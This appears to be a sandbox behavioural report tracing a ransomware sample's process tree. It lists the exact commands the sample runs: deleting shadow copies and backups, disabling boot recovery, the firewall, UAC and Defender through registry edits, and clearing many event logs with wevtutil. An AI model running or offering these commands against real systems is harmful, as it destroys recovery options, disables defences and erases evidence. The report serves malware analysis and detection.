- Suspicious use of WriteProcessMemory
PID:556
- C:\Users\Admin\AppData\Roaming\[email protected]
  "C:\Users\Admin\AppData\Roaming\[email protected]"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies system executable filetype association
  - Executes dropped EXE
  - Modifies extensions of user files
  - Deletes itself
  - Drops startup file
  - Drops desktop.ini file(s)
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1772
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reagentc /disable
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      PID:1544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1392
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:540
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1224
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:560
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1092
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:636
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1820
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:828
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:580
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:520
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:316
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1016
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      PID:1712
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1476
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode=disable
      4⤵
      PID:216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Windows\A8C4AD38.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:576
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d "1" /f
      4⤵
      PID:1244
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" /v "ClientCacheTime" /t REG_DWORD /d "0" /f
      4⤵
      PID:1492
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
      4⤵
      PID:1840
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
      4⤵
      PID:540
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
      4⤵
      PID:1972
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
      4⤵
      PID:1308
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
      4⤵
      PID:868
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
      4⤵
      PID:1628
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\CredSSP\Parameters" /v "AllowEncryptionOracle" /t REG_DWORD /d "2" /f
      4⤵
      PID:1648
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
      4⤵
      PID:1544
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
      4⤵
      PID:1116
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f
      4⤵
      PID:980
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
      4⤵
      PID:1080
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:1500
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas" /ve /t REG_SZ /d "Take Ownership" /f
      4⤵
      Modifies registry class
      PID:232
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:212
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
      4⤵
      Modifies registry class
      PID:2024
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
      4⤵
      Modifies registry class
      PID:768
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Take Ownership" /f
      4⤵
      Modifies registry class
      PID:288
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:1112
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
      4⤵
      Modifies registry class
      PID:1884
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
      4⤵
      Modifies registry class
      PID:1076
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\#FILES-ENCRYPTED.txt
    3⤵
    PID:956
- - C:\Windows\BackupXXXA8C4AD38.exe
    "C:\Windows\BackupXXXA8C4AD38.exe"
    3⤵
    - Executes dropped EXE
    PID:1676
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd"
      4⤵
      PID:560
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=20
        5⤵
        
        PID:1712
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" /v "ClientCacheTime" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:980
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:232
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        5⤵
        
        PID:768
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=disable
        5⤵
        
        PID:1988
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1940
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:556
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:908
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:1484
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:1520
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=25
        5⤵
        
        PID:288
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 8
        5⤵
        Runs ping.exe
        
        PID:892
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2.bat"
      4⤵
      PID:1080
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=20
        5⤵
        
        PID:1216
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WEVTUTIL EL
        5⤵
        
        PID:1988
      - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL EL
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Analytic"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Application"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "DebugChannel"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "DirectShowFilterGraph"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "DirectShowPluginControl"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Els_Hyphenation/Analytic"
        5⤵
        
        PID:1640
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "EndpointMapper"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "ForwardedEvents"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "HardwareEvents"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Internet Explorer"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Key Management Service"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Media Center"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationDeviceProxy"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPerformance"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPipeline"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPlatform"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-IE/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-IEDVTOOL/Diagnostic"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        5⤵
        
        PID:700
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
        5⤵
        
        PID:1972
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-API-Tracing/Operational"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AltTab/Diagnostic"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
        5⤵
        
        PID:540
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/CaptureMonitor"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/Operational"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audio/Performance"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Audit/Analytic"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Authentication User Interface/Operational"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AxInstallService/Log"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Backup"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Biometrics/Operational"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
        5⤵
        
        PID:288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bits-Client/Analytic"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bits-Client/Operational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCache/Operational"
        5⤵
        
        PID:1976
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Analytic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-BranchCacheSMB/Operational"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CAPI2/Operational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CDROM/Operational"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COM/Analytic"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-COMRuntime/Tracing"
        5⤵
        
        PID:1972
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Calculator/Debug"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Calculator/Diagnostic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CertPoleEng/Operational"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CmiSetup/Analytic"
        5⤵
        
        PID:1976
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Operational"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CodeIntegrity/Verbose"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ComDlg32/Analytic"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ComDlg32/Debug"
        5⤵
        
        PID:1716
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
        5⤵
        
        PID:1520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-CredUI/Diagnostic"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Crypto-RNG/Analytic"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-D3D10Level9/Analytic"
        5⤵
        
        PID:700
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-D3D10Level9/PerfTiming"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DCLocator/Debug"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
        5⤵
        
        PID:1880
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
        5⤵
        
        PID:1244
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DhcpNap/Admin"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DhcpNap/Operational"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
        5⤵
        
        PID:288
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
        5⤵
        
        PID:308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-TaskManager/Debug"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
        5⤵
        
        PID:1792
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
        5⤵
        
        PID:1840
